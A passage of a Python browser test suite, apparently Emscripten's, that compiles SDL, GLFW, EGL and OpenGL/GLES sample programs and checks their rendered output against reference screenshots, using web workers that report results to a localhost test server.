shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def do_test_worker(self, args=[]):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.test_port)
html_file.close()
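    # Build the worker twice: once with file.dat preloaded and once without, and verify the reported message in each case.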
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
assert os.path.exists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
def test_chunked_synchronous_xhr(self):
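    # The worker lazily maps /bigfile to a URL served in chunks by test_chunked_synchronous_xhr_server, reads it, and reports a checksum
    # (compared against zlib.adler32 of the generated data) back through the stdout channel.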
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.test_port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename]).communicate()
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,self.test_port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
        args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args, timeout=30)
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
      self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'] + args)
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
      open('file1.txt', 'w').write('first')
      open('file2.txt', 'w').write('second')
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'NO_EXIT_RUNTIME=0']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0', args=['-lGL'])
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'SPLIT_MEMORY=16777216']) # check for uniform4fv slice being valid in split memory
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
def test_s3tc_crunch(self):
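    # CRUNCH is only defined when a crunch binary is configured; if it is missing, the print below raises and the test is skipped.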
try:
print('Crunch is located at ' + CRUNCH)
except:
return self.skip('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
def test(args):
print(args)
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
open('text.txt', 'w').write('123')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'] + args, stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
test([])
test(['text.txt']) # also package a non-crunch file
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
try:
